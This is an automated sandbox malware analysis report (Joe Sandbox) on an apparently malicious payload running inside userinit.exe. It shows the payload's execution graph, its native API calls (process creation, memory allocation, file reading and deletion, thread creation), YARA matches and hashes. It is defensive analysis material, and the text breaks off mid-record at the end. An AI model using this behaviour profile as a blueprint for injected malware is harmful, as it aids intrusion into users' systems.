                                                      execution_graph 96466 ab23e8 96469 ab5f50 96466->96469 96468 ab2413 96470 ab5f83 96469->96470 96471 ab5fa7 96470->96471 96476 ac8bf0 96470->96476 96471->96468 96473 ab5fca 96473->96471 96480 ac90b0 96473->96480 96475 ab604a 96475->96468 96477 ac8c0d 96476->96477 96483 3362ca0 LdrInitializeThunk 96477->96483 96478 ac8c39 96478->96473 96481 ac90cd 96480->96481 96482 ac90de NtClose 96481->96482 96482->96475 96483->96478 96485 ab84e1 96486 ab84f1 96485->96486 96487 ab84a1 96486->96487 96489 ab6c40 LdrInitializeThunk LdrInitializeThunk 96486->96489 96489->96487 96490 ab6a20 96491 ab6a4a 96490->96491 96494 ab7bf0 96491->96494 96493 ab6a74 96495 ab7c0d 96494->96495 96501 ac87e0 96495->96501 96497 ab7c5d 96498 ab7c64 96497->96498 96506 ac88c0 96497->96506 96498->96493 96500 ab7c8d 96500->96493 96502 ac887b 96501->96502 96504 ac880b 96501->96504 96511 3362f30 LdrInitializeThunk 96502->96511 96503 ac88b4 96503->96497 96504->96497 96507 ac88ef 96506->96507 96508 ac8971 96506->96508 96507->96500 96512 3362d10 LdrInitializeThunk 96508->96512 96509 ac89b6 96509->96500 96511->96503 96512->96509 96513 ab6fe0 96514 ab6ff8 96513->96514 96516 ab7052 96513->96516 96514->96516 96517 abaf30 96514->96517 96519 abaf56 96517->96519 96518 abb17d 96518->96516 96519->96518 96544 ac94b0 96519->96544 96521 abafcc 96521->96518 96547 acc4a0 96521->96547 96523 abafeb 96523->96518 96524 abb0bc 96523->96524 96553 ac86f0 96523->96553 96527 ab57c0 LdrInitializeThunk 96524->96527 96528 abb0d8 96524->96528 96527->96528 96543 abb165 96528->96543 96564 ac8260 96528->96564 96529 abb056 96529->96518 96537 abb085 96529->96537 96538 abb0a4 96529->96538 96557 ab57c0 96529->96557 96531 ab7dc0 LdrInitializeThunk 96536 abb173 96531->96536 96536->96516 96579 ac44b0 LdrInitializeThunk 96537->96579 96560 ab7dc0 96538->96560 96539 abb13c 96569 ac8310 96539->96569 96541 abb156 96574 ac8470 96541->96574 96543->96531 96545 ac94cd 96544->96545 96546 ac94de CreateProcessInternalW 96545->96546 96546->96521 96548 acc410 96547->96548 96550 acc46d 96548->96550 96580 acb290 96548->96580 96550->96523 96551 acc44a 96583 acb1b0 96551->96583 96554 ac870d 96553->96554 96592 3362c0a 96554->96592 96555 abb04d 96555->96524 96555->96529 96558 ac88c0 LdrInitializeThunk 96557->96558 96559 ab57fe 96557->96559 96558->96559 96559->96537 96561 ab7dd3 96560->96561 96595 ac85f0 96561->96595 96563 ab7dfe 96563->96516 96565 ac82dd 96564->96565 96567 ac828b 96564->96567 96601 33639b0 LdrInitializeThunk 96565->96601 96566 ac8302 96566->96539 96567->96539 96570 ac8390 96569->96570 96571 ac833e 96569->96571 96602 3364340 LdrInitializeThunk 96570->96602 96571->96541 96572 ac83b5 96572->96541 96575 ac84f0 96574->96575 96577 ac849e 96574->96577 96603 3362fb0 LdrInitializeThunk 96575->96603 96576 ac8515 96576->96543 96577->96543 96579->96538 96586 ac93d0 96580->96586 96582 acb2ab 96582->96551 96589 ac9420 96583->96589 96585 acb1c9 96585->96550 96587 ac93ea 96586->96587 96588 ac93fb RtlAllocateHeap 96587->96588 96588->96582 96590 ac943d 96589->96590 96591 ac944e RtlFreeHeap 96590->96591 96591->96585 96593 3362c11 96592->96593 96594 3362c1f LdrInitializeThunk 96592->96594 96593->96555 96594->96555 96596 ac866e 96595->96596 96598 ac861b 96595->96598 96600 3362dd0 LdrInitializeThunk 96596->96600 96597 ac8693 96597->96563 96598->96563 96600->96597 96601->96566 96602->96572 96603->96576 96604 ac86a0 96605 ac86ba 96604->96605 96608 3362df0 LdrInitializeThunk 96605->96608 96606 ac86e2 96608->96606 96614 ac5da0 96615 ac5dfa 96614->96615 96617 ac5e07 96615->96617 96618 ac3790 96615->96618 96625 acb120 96618->96625 96620 ac37d1 96623 ac38de 96620->96623 96628 ab41d0 96620->96628 96622 ac3860 Sleep 96624 ac3817 96622->96624 96623->96617 96624->96622 96624->96623 96635 ac9210 96625->96635 96627 acb151 96627->96620 96630 ab41f4 96628->96630 96629 ab41fb 96629->96624 96630->96629 96631 ab421a 96630->96631 96639 acc750 LdrLoadDll 96630->96639 96633 ab4230 LdrLoadDll 96631->96633 96634 ab4247 96631->96634 96633->96634 96634->96624 96636 ac92a5 96635->96636 96638 ac923b 96635->96638 96637 ac92bb NtAllocateVirtualMemory 96636->96637 96637->96627 96638->96627 96639->96631 96640 ac8520 96641 ac85af 96640->96641 96642 ac854b 96640->96642 96645 3362ee0 LdrInitializeThunk 96641->96645 96643 ac85e0 96645->96643 96646 ab58e4 96647 ab586d 96646->96647 96649 ab589c 96647->96649 96650 ab7d40 96647->96650 96651 ab7d84 96650->96651 96656 ab7da5 96651->96656 96657 ac83c0 96651->96657 96653 ab7d95 96654 ab7db1 96653->96654 96655 ac90b0 NtClose 96653->96655 96654->96647 96655->96656 96656->96647 96658 ac8440 96657->96658 96660 ac83ee 96657->96660 96662 3364650 LdrInitializeThunk 96658->96662 96659 ac8465 96659->96653 96660->96653 96662->96659 96665 ab2d7c 96670 ab7a40 96665->96670 96668 ac90b0 NtClose 96669 ab2da8 96668->96669 96671 ab7a5a 96670->96671 96675 ab2d8c 96670->96675 96676 ac8790 96671->96676 96674 ac90b0 NtClose 96674->96675 96675->96668 96675->96669 96677 ac87aa 96676->96677 96680 33635c0 LdrInitializeThunk 96677->96680 96678 ab7b2a 96678->96674 96680->96678 96681 aa9af0 96682 aa9aff 96681->96682 96683 aa9b40 96682->96683 96684 aa9b2d CreateThread 96682->96684 96685 ab09f0 96686 ab0a0a 96685->96686 96687 ab41d0 2 API calls 96686->96687 96688 ab0a28 96687->96688 96689 ab0a6d 96688->96689 96690 ab0a5c PostThreadMessageW 96688->96690 96690->96689 96696 ab58c9 96697 ab5852 96696->96697 96698 ab7dc0 LdrInitializeThunk 96697->96698 96701 ab5870 96698->96701 96699 ab7d40 2 API calls 96699->96701 96700 ab589c 96701->96699 96701->96700 96702 3362ad0 LdrInitializeThunk 96703 aab180 96704 acb120 NtAllocateVirtualMemory 96703->96704 96705 aac7f1 96704->96705 96706 abfe00 96707 abfe1d 96706->96707 96708 ab41d0 2 API calls 96707->96708 96709 abfe3b 96708->96709 96710 ab6e00 96711 ab6e1c 96710->96711 96719 ab6e6f 96710->96719 96713 ac90b0 NtClose 96711->96713 96711->96719 96712 ab6fa7 96714 ab6e37 96713->96714 96720 ab61e0 NtClose LdrInitializeThunk LdrInitializeThunk 96714->96720 96716 ab6f81 96716->96712 96722 ab63b0 NtClose LdrInitializeThunk LdrInitializeThunk 96716->96722 96719->96712 96721 ab61e0 NtClose LdrInitializeThunk LdrInitializeThunk 96719->96721 96720->96719 96721->96716 96722->96712 96723 abf500 96724 abf564 96723->96724 96725 ab5f50 2 API calls 96724->96725 96727 abf697 96725->96727 96726 abf69e 96727->96726 96752 ab6060 96727->96752 96729 abf843 96730 abf71a 96730->96729 96731 abf852 96730->96731 96756 abf2e0 96730->96756 96732 ac90b0 NtClose 96731->96732 96734 abf85c 96732->96734 96735 abf756 96735->96731 96736 abf761 96735->96736 96737 acb290 RtlAllocateHeap 96736->96737 96738 abf78a 96737->96738 96739 abf7a9 96738->96739 96740 abf793 96738->96740 96765 abf1d0 CoInitialize 96739->96765 96742 ac90b0 NtClose 96740->96742 96743 abf79d 96742->96743 96744 abf7b7 96768 ac8b50 96744->96768 96746 abf832 96747 ac90b0 NtClose 96746->96747 96748 abf83c 96747->96748 96749 acb1b0 RtlFreeHeap 96748->96749 96749->96729 96750 abf7d5 96750->96746 96751 ac8b50 LdrInitializeThunk 96750->96751 96751->96750 96753 ab6085 96752->96753 96772 ac8a00 96753->96772 96757 abf2fc 96756->96757 96758 ab41d0 2 API calls 96757->96758 96760 abf31a 96758->96760 96759 abf323 96759->96735 96760->96759 96761 ab41d0 2 API calls 96760->96761 96762 abf3ee 96761->96762 96763 ab41d0 2 API calls 96762->96763 96764 abf448 96762->96764 96763->96764 96764->96735 96767 abf235 96765->96767 96766 abf2cb CoUninitialize 96766->96744 96767->96766 96769 ac8b6a 96768->96769 96777 3362ba0 LdrInitializeThunk 96769->96777 96770 ac8b9a 96770->96750 96773 ac8a1a 96772->96773 96776 3362c60 LdrInitializeThunk 96773->96776 96774 ab60f9 96774->96730 96776->96774 96777->96770 96778 ac9000 96779 ac907a 96778->96779 96781 ac902e 96778->96781 96780 ac9090 NtDeleteFile 96779->96780 96782 ac1440 96783 ac145c 96782->96783 96784 ac1498 96783->96784 96785 ac1484 96783->96785 96786 ac90b0 NtClose 96784->96786 96787 ac90b0 NtClose 96785->96787 96789 ac14a1 96786->96789 96788 ac148d 96787->96788 96792 acb2d0 RtlAllocateHeap 96789->96792 96791 ac14ac 96792->96791 96798 ab98df 96799 ab98ef 96798->96799 96800 ab98f6 96799->96800 96801 acb1b0 RtlFreeHeap 96799->96801 96801->96800 96802 ac1759 96803 ac175f 96802->96803 96804 ac90b0 NtClose 96803->96804 96806 ac1764 96803->96806 96805 ac1789 96804->96805 96807 aa9b50 96809 aa9da3 96807->96809 96810 aa9f74 96809->96810 96811 acae10 96809->96811 96812 acae36 96811->96812 96817 aa4120 96812->96817 96814 acae42 96815 acae7b 96814->96815 96820 ac5330 96814->96820 96815->96810 96824 ab2e80 96817->96824 96819 aa412d 96819->96814 96821 ac5392 96820->96821 96823 ac539f 96821->96823 96835 ab1630 96821->96835 96823->96815 96825 ab2e9d 96824->96825 96827 ab2eb6 96825->96827 96828 ac9b30 96825->96828 96827->96819 96830 ac9b4a 96828->96830 96829 ac9b79 96829->96827 96830->96829 96831 ac86f0 LdrInitializeThunk 96830->96831 96832 ac9bd9 96831->96832 96833 acb1b0 RtlFreeHeap 96832->96833 96834 ac9bf2 96833->96834 96834->96827 96836 ab166b 96835->96836 96851 ab7b50 96836->96851 96838 ab1673 96839 ab1956 96838->96839 96840 acb290 RtlAllocateHeap 96838->96840 96839->96823 96841 ab1689 96840->96841 96842 acb290 RtlAllocateHeap 96841->96842 96843 ab169a 96842->96843 96844 acb290 RtlAllocateHeap 96843->96844 96845 ab16ab 96844->96845 96850 ab1742 96845->96850 96866 ab66b0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96845->96866 96847 ab41d0 2 API calls 96848 ab1902 96847->96848 96862 ac7c70 96848->96862 96850->96847 96852 ab7b7c 96851->96852 96853 ab7a40 2 API calls 96852->96853 96854 ab7b9f 96853->96854 96855 ab7ba9 96854->96855 96856 ab7bc1 96854->96856 96857 ab7bb4 96855->96857 96859 ac90b0 NtClose 96855->96859 96858 ab7bdd 96856->96858 96860 ac90b0 NtClose 96856->96860 96857->96838 96858->96838 96859->96857 96861 ab7bd3 96860->96861 96861->96838 96863 ac7cd2 96862->96863 96865 ac7cdf 96863->96865 96867 ab1970 96863->96867 96865->96839 96866->96850 96885 ab7e20 96867->96885 96869 ab1ef3 96869->96865 96870 ab1990 96870->96869 96889 ac0e10 96870->96889 96873 ab1ba1 96875 acc4a0 2 API calls 96873->96875 96874 ab19ee 96874->96869 96892 acc370 96874->96892 96878 ab1bb6 96875->96878 96876 ab7dc0 LdrInitializeThunk 96880 ab1c06 96876->96880 96877 ac55a0 LdrInitializeThunk 96877->96880 96878->96880 96897 ab0480 96878->96897 96880->96869 96880->96876 96880->96877 96882 ab0480 LdrInitializeThunk 96880->96882 96881 ab7dc0 LdrInitializeThunk 96884 ab1d60 96881->96884 96882->96880 96884->96880 96884->96881 96901 ac55a0 96884->96901 96886 ab7e2d 96885->96886 96887 ab7e4e SetErrorMode 96886->96887 96888 ab7e55 96886->96888 96887->96888 96888->96870 96890 acb120 NtAllocateVirtualMemory 96889->96890 96891 ac0e31 96889->96891 96890->96891 96891->96874 96893 acc386 96892->96893 96894 acc380 96892->96894 96895 acb290 RtlAllocateHeap 96893->96895 96894->96873 96896 acc3ac 96895->96896 96896->96873 96898 ab049a 96897->96898 96905 ac9330 96898->96905 96902 ac5602 96901->96902 96904 ac5613 96902->96904 96910 ab7570 96902->96910 96904->96884 96906 ac934d 96905->96906 96909 3362c70 LdrInitializeThunk 96906->96909 96907 ab04a2 96907->96884 96909->96907 96911 ab74a0 96910->96911 96912 ab75a5 96910->96912 96911->96912 96913 ab0480 LdrInitializeThunk 96911->96913 96914 ab755e 96913->96914 96914->96904 96915 abc290 96917 abc2b9 96915->96917 96916 abc3bd 96917->96916 96918 abc363 FindFirstFileW 96917->96918 96918->96916 96920 abc37e 96918->96920 96919 abc3a4 FindNextFileW 96919->96920 96921 abc3b6 FindClose 96919->96921 96920->96919 96921->96916 96922 abaa10 96927 aba720 96922->96927 96924 abaa1d 96941 aba3a0 96924->96941 96926 abaa33 96928 aba745 96927->96928 96952 ab8030 96928->96952 96931 aba890 96931->96924 96933 aba8a7 96933->96924 96934 aba89e 96934->96933 96936 aba995 96934->96936 96971 ab9df0 96934->96971 96938 aba9fa 96936->96938 96980 aba160 96936->96980 96939 acb1b0 RtlFreeHeap 96938->96939 96940 abaa01 96939->96940 96940->96924 96942 aba3b6 96941->96942 96949 aba3c1 96941->96949 96943 acb290 RtlAllocateHeap 96942->96943 96943->96949 96944 aba3e2 96944->96926 96945 ab8030 GetFileAttributesW 96945->96949 96946 aba6f2 96947 aba70b 96946->96947 96948 acb1b0 RtlFreeHeap 96946->96948 96947->96926 96948->96947 96949->96944 96949->96945 96949->96946 96950 ab9df0 RtlFreeHeap 96949->96950 96951 aba160 RtlFreeHeap 96949->96951 96950->96949 96951->96949 96953 ab8051 96952->96953 96954 ab8058 GetFileAttributesW 96953->96954 96955 ab8063 96953->96955 96954->96955 96955->96931 96956 ac3070 96955->96956 96957 ac307e 96956->96957 96958 ac3085 96956->96958 96957->96934 96959 ab41d0 2 API calls 96958->96959 96960 ac30ba 96959->96960 96961 ac30c9 96960->96961 96984 ac2b30 LdrLoadDll LdrLoadDll 96960->96984 96963 acb290 RtlAllocateHeap 96961->96963 96967 ac3274 96961->96967 96964 ac30e2 96963->96964 96965 ac326a 96964->96965 96964->96967 96968 ac30fe 96964->96968 96966 acb1b0 RtlFreeHeap 96965->96966 96965->96967 96966->96967 96967->96934 96968->96967 96969 acb1b0 RtlFreeHeap 96968->96969 96970 ac325e 96969->96970 96970->96934 96972 ab9e16 96971->96972 96985 abd810 96972->96985 96974 ab9e88 96976 aba010 96974->96976 96977 ab9ea6 96974->96977 96975 ab9ff5 96975->96934 96976->96975 96978 ab9cb0 RtlFreeHeap 96976->96978 96977->96975 96990 ab9cb0 96977->96990 96978->96976 96981 aba186 96980->96981 96982 abd810 RtlFreeHeap 96981->96982 96983 aba20d 96982->96983 96983->96936 96984->96961 96986 abd834 96985->96986 96987 abd841 96986->96987 96988 acb1b0 RtlFreeHeap 96986->96988 96987->96974 96989 abd884 96988->96989 96989->96974 96991 ab9ccd 96990->96991 96994 abd8a0 96991->96994 96993 ab9dd3 96993->96977 96995 abd8c4 96994->96995 96996 abd96e 96995->96996 96997 acb1b0 RtlFreeHeap 96995->96997 96996->96993 96997->96996 96998 ab1f10 96999 ab1f46 96998->96999 97000 ac86f0 LdrInitializeThunk 96998->97000 97003 ac9140 96999->97003 97000->96999 97002 ab1f5b 97004 ac91d2 97003->97004 97006 ac916e 97003->97006 97008 3362e80 LdrInitializeThunk 97004->97008 97005 ac9203 97005->97002 97006->97002 97008->97005 97009 ac8d90 97010 ac8dbf 97009->97010 97011 ac8e47 97009->97011 97012 ac8e5d NtCreateFile 97011->97012 97013 ac17d0 97017 ac17e9 97013->97017 97014 ac1831 97015 acb1b0 RtlFreeHeap 97014->97015 97016 ac1841 97015->97016 97017->97014 97018 ac1874 97017->97018 97020 ac1879 97017->97020 97019 acb1b0 RtlFreeHeap 97018->97019 97019->97020 97021 acc3d0 97022 acb1b0 RtlFreeHeap 97021->97022 97023 acc3e5 97022->97023 97024 ac0fd1 97036 ac8f00 97024->97036 97026 ac0ff2 97027 ac1025 97026->97027 97028 ac1010 97026->97028 97030 ac90b0 NtClose 97027->97030 97029 ac90b0 NtClose 97028->97029 97031 ac1019 97029->97031 97033 ac102e 97030->97033 97032 ac1065 97033->97032 97034 acb1b0 RtlFreeHeap 97033->97034 97035 ac1059 97034->97035 97037 ac8faa 97036->97037 97039 ac8f2e 97036->97039 97038 ac8fc0 NtReadFile 97037->97038 97038->97026 97039->97026

                                                      Executed Functions

                                                      Function 00AA9B50 Relevance: 22.8, Strings: 18, Instructions: 276COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 166 aa9b50-aa9da1 167 aa9db2-aa9dbe 166->167 168 aa9da3-aa9dac 166->168 169 aa9dc0-aa9dd3 167->169 170 aa9dd5 167->170 168->167 169->168 171 aa9ddc-aa9de3 170->171 172 aa9e0a-aa9e11 171->172 173 aa9de5-aa9e08 171->173 174 aa9e18-aa9e31 172->174 173->171 174->174 175 aa9e33-aa9e3c 174->175 176 aa9e42-aa9e4c 175->176 177 aa9f14-aa9f1b 175->177 180 aa9e5d-aa9e66 176->180 178 aaa04f-aaa059 177->178 179 aa9f21-aa9f2b 177->179 184 aaa06a-aaa076 178->184 181 aa9f3c-aa9f48 179->181 182 aa9e68-aa9e74 180->182 183 aa9e76-aa9e79 180->183 185 aa9f4a-aa9f53 181->185 186 aa9f6f call acae10 181->186 182->180 188 aa9e7f-aa9e86 183->188 189 aaa078-aaa081 184->189 190 aaa08e-aaa095 184->190 191 aa9f5a-aa9f5c 185->191 192 aa9f55-aa9f59 185->192 203 aa9f74-aa9f7e 186->203 193 aa9eb8-aa9ec2 188->193 194 aa9e88-aa9eb6 188->194 196 aaa08c 189->196 197 aaa083-aaa086 189->197 198 aaa0c7-aaa0d0 190->198 199 aaa097-aaa0c5 190->199 200 aa9f5e-aa9f67 191->200 201 aa9f6d 191->201 192->191 202 aa9ed3-aa9edf 193->202 194->188 196->184 197->196 199->190 200->201 205 aa9f2d-aa9f36 201->205 206 aa9ef2-aa9f01 202->206 207 aa9ee1-aa9ef0 202->207 208 aa9f8f-aa9f9b 203->208 205->181 209 aa9f03 206->209 210 aa9f05-aa9f0f 206->210 207->202 211 aa9fa8-aa9fac 208->211 212 aa9f9d-aa9fa6 208->212 209->177 210->175 214 aa9fae-aa9fd3 211->214 215 aa9fd5-aa9fde 211->215 212->208 214->211 217 aa9fe0-aa9ff2 215->217 218 aa9ff4-aa9ffb 215->218 217->215 219 aa9ffd-aaa020 218->219 220 aaa022-aaa026 218->220 219->218 220->178 221 aaa028-aaa04d 220->221 221->220
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #o$,$,!$.$.DXd$0$1|$61$6T$@8$D4$E$J$T$Xd$ZW$b$f
                                                      • API String ID: 0-2960789933
                                                      • Opcode ID: b19bebff46af8e153ccb2d4897266fdbd8886ef31321bc33c71d44196ce172c8
                                                      • Instruction ID: acb217886ae590db4ecc0a3489f3dd6dcc4703cb15d87765c8ebc64c63d87a86
                                                      • Opcode Fuzzy Hash: b19bebff46af8e153ccb2d4897266fdbd8886ef31321bc33c71d44196ce172c8
                                                      • Instruction Fuzzy Hash: 31E1C2B0E0526DCFEB24CF44C994BEEBBB1BB46308F1081D9D1596B281D7B91A88DF51
                                                      Function 00ABC290 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 00ABC374
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 00ABC3AF
                                                      • FindClose.KERNELBASE(?), ref: 00ABC3BA
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 66c96e6f90ef2f9e47d2401661692ba17a794f59cb98951b2a74a0c6821fe9ec
                                                      • Instruction ID: 73dd39ec105de132eb7108900bce614865b841b29876c535b4f11166adc2920c
                                                      • Opcode Fuzzy Hash: 66c96e6f90ef2f9e47d2401661692ba17a794f59cb98951b2a74a0c6821fe9ec
                                                      • Instruction Fuzzy Hash: DD3183B5A40308BBDB20EB64CD85FFF77BC9F44714F144559B908AB182DB70AA848BA0
                                                      Function 00AC8D90 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(2888A750,?,?,?,?,?,?,?,?,?,?), ref: 00AC8E8E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 8263e9b9b3655f0d7f7f85571750a182001a6f476e1524a903f998bad7412ed5
                                                      • Instruction ID: 4fe866f6fe1a5fff6f9eba305058c3a974b80638143728afb750bb8b6eb2e295
                                                      • Opcode Fuzzy Hash: 8263e9b9b3655f0d7f7f85571750a182001a6f476e1524a903f998bad7412ed5
                                                      • Instruction Fuzzy Hash: DE31D3B5A01208AFCB14DF98D981EEEB7B9EF8C314F108209F919A7340D734A951CFA5
                                                      Function 00AC8F00 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(2888A750,?,?,?,?,?,?,?,?), ref: 00AC8FE9
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: f9e2abaf3592445059f4fccfabe1212306f5964c21800777085ab5dbbfcdb515
                                                      • Instruction ID: f294725e5343ee6b9a750754d1a3c1790bc1b3d7afb19d56fe284641cc114d33
                                                      • Opcode Fuzzy Hash: f9e2abaf3592445059f4fccfabe1212306f5964c21800777085ab5dbbfcdb515
                                                      • Instruction Fuzzy Hash: 9131E5B5A00208AFDB14DF98D881EEFB7B9EF8C314F108219F919A7341D774A9518FA5
                                                      Function 00AC9210 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(2888A750,?,00AC7CDF,00000000,00000004,00003000,?,?,?,?,?,00AC7CDF,00AB19EE,00AB19EE,00000000,?), ref: 00AC92D8
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: 9748e708b96aa18100ac35f0450ba1d82ff0ea418837c52caf31f50557a53c81
                                                      • Instruction ID: 42438409e396d3db223144ef6a12adfecf391f34ee64d31c27b8670ef6229999
                                                      • Opcode Fuzzy Hash: 9748e708b96aa18100ac35f0450ba1d82ff0ea418837c52caf31f50557a53c81
                                                      • Instruction Fuzzy Hash: B32106B5A00208AFDB14DF98DD81FEFB7B9EF88300F108109F919A7240D774A9118BA1
                                                      Function 00AC9000 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtDeleteFile.NTDLL(2888A750), ref: 00AC9099
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 32f47c7f7706f169638fbfc647d15ffa62a41e2f99afdc25711ee14c5b4c1205
                                                      • Instruction ID: 9b39a6d6ad0482f6529e0862f6d65ff17fabe3d965d5f5a36c5338125283190a
                                                      • Opcode Fuzzy Hash: 32f47c7f7706f169638fbfc647d15ffa62a41e2f99afdc25711ee14c5b4c1205
                                                      • Instruction Fuzzy Hash: 831182B1510608BFD620EB68CC42FEF7BACDF89314F00814DFA19A7281D7757A158BA5
                                                      Function 00AC90B0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00AC90E7
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                      • Instruction ID: 7451c1613f599e1abf559094a5830292a0d7df6ef84ac3603e4ef2a214c25a73
                                                      • Opcode Fuzzy Hash: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                      • Instruction Fuzzy Hash: E0E046762002087FD620AA5ADC81F9B7BACDBC6764F418019FA09AB242C671B91587F5
                                                      Function 03364340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 205ac3a381bb813e9c7082d4a7a17b6f7fa826acc4e700614dd64c116b742f9b
                                                      • Instruction ID: d3bdfa6c368042d784d79eec6a33c393121408c2cfb38c0f5ceee89d31ab18da
                                                      • Opcode Fuzzy Hash: 205ac3a381bb813e9c7082d4a7a17b6f7fa826acc4e700614dd64c116b742f9b
                                                      • Instruction Fuzzy Hash: 11900235615804129190B15C48C9546404597E0301B55C021E0424954C8B188A565361
                                                      Function 03364650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 76e0ff61dca9ccf8a099f69890ce22cb880f0f6984fac4b9143aa553188cfc78
                                                      • Instruction ID: 5a163635b1e153fd026380bde370488fa3cda0a724bd53d8fb9d04a30cc06344
                                                      • Opcode Fuzzy Hash: 76e0ff61dca9ccf8a099f69890ce22cb880f0f6984fac4b9143aa553188cfc78
                                                      • Instruction Fuzzy Hash: 8D900265611504424190B15C4849406604597E1301395C125A0554960C871C89559269
                                                      Function 03362B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
